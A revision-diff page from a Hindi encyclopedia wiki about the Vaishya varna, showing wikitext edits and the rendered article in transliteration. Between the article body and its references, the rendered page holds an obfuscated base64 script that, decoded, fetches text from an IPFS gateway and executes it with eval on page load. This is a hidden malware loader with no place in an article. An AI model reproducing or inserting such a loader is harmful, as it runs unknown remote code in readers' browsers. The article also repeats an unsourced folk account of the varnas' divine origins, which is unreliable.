Difference between revisions of "वैश्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m
Line 1: Line 1:
[[हिंदू|हिंदुओं]] की वर्ण व्यवस्था में [[वैश्य]] का तीसरा स्थान है।वैश्य वर्ण के लोग मुख्यतया [[वाणिज्य]] व्यवसाय और [[कृषि]] करते थे।     
+
{{पुनरीक्षण}}
हिंदुओं की [[जाति]] व्यवस्था के अंतर्गत '''वैश्य''' [[वर्णाश्रम]] का तीसरा महत्वपूर्ण स्तंभ है। इस वर्ग में मुख्य रूप से [[भारतीय]] समाज के [[किसान]], [[पशुपालक]], और [[व्यापारी]] समुदाय शामिल है।  
+
{{tocright}}
 +
[[हिंदू|हिंदुओं]] की वर्ण व्यवस्था में [[वैश्य]] का तीसरा स्थान है।वैश्य वर्ण के लोग मुख्यतया वाणिज्य व्यवसाय और [[कृषि]] करते थे।     
 +
हिंदुओं की जाति व्यवस्था के अंतर्गत '''वैश्य''' वर्णाश्रम का तीसरा महत्वपूर्ण स्तंभ है। इस वर्ग में मुख्य रूप से भारतीय समाज के किसान, पशुपालक, और व्यापारी समुदाय शामिल है।  
  
अर्थ की दृष्टि से इस शब्द की उत्पत्ति [[संस्कृत]] से हुई है जिसका मूल अर्थ "बसना" होता है। [[मनु]] के [[मनुस्मृति]] के अनुसार वैश्यों की उत्पत्ति [[ब्रम्हा]] के उदर यानि पेट से हुई है।  
+
अर्थ की दृष्टि से इस शब्द की उत्पत्ति [[संस्कृत]] से हुई है जिसका मूल अर्थ "बसना" होता है। [[मनु]] के [[मनुस्मृति]] के अनुसार वैश्यों की उत्पत्ति [[ब्रह्मा]] के उदर यानि पेट से हुई है।  
  
 
== यह भी देखें ==
 
== यह भी देखें ==
Line 14: Line 16:
 
* [[क्षत्रिय]]
 
* [[क्षत्रिय]]
 
* [[शूद्र]]
 
* [[शूद्र]]
[[ब्रहमा]] जी से पैदा होनऐ वालऐ ब्राह्मन कहलाऐ,विश्नु से पेदा होने वाले वैश ,शकर जी से पैदा होने वाले छतिरय ,इसलिये आज भी ब्राह्मन अपनी मात्ता सरसवती,वैश लकश्मी,छतरी मा दुर्गे की पुजा करते है।
+
[[ब्रह्मा]] जी से पैदा होनऐ वालऐ ब्राह्मन कहलाऐ, [[विष्णु]] से पेदा होने वाले वैश, [[शंकर]] जी से पैदा होने वाले छतिरय, इसलिये आज भी ब्राह्मन अपनी मात्ता [[सरस्वती]], वैश [[लक्ष्मी]], छतरी [[दुर्गा|माँ दुर्गे]] की पुजा करते है।
 +
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 +
{{cite book | last =भट्टाचार्य | first =सच्चिदानंद | title =भारतीय इतिहास कोश| edition = | publisher =उत्तरप्रदेश हिंदी संस्थान| location =लखनऊ| language =हिंदी| pages =442  | chapter =}}
 +
==बाहरी कड़ियाँ==
 +
==संबंधित लेख==
 +
{{जातियाँ और जन जातियाँ}}
 +
[[Category:जातियाँ और जन जातियाँ]]
 +
[[Category:इतिहास कोश]]
 +
__INDEX__

Revision as of 05:22, 7 December 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

hianduoan ki varn vyavastha mean vaishy ka tisara sthan hai.vaishy varn ke log mukhyataya vanijy vyavasay aur krishi karate the. hianduoan ki jati vyavastha ke aantargat vaishy varnashram ka tisara mahatvapoorn stanbh hai. is varg mean mukhy roop se bharatiy samaj ke kisan, pashupalak, aur vyapari samuday shamil hai.

arth ki drishti se is shabd ki utpatti sanskrit se huee hai jisaka mool arth "basana" hota hai. manu ke manusmriti ke anusar vaishyoan ki utpatti brahma ke udar yani pet se huee hai.

yah bhi dekhean

brahma ji se paida honai valai brahman kahalaai, vishnu se peda hone vale vaish, shankar ji se paida hone vale chhatiray, isaliye aj bhi brahman apani matta sarasvati, vaish lakshmi, chhatari maan durge ki puja karate hai.

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


bhattachary, sachchidanand bharatiy itihas kosh (hiandi). lakhanoo: uttarapradesh hiandi sansthan, 442.

bahari k diyaan

sanbandhit lekh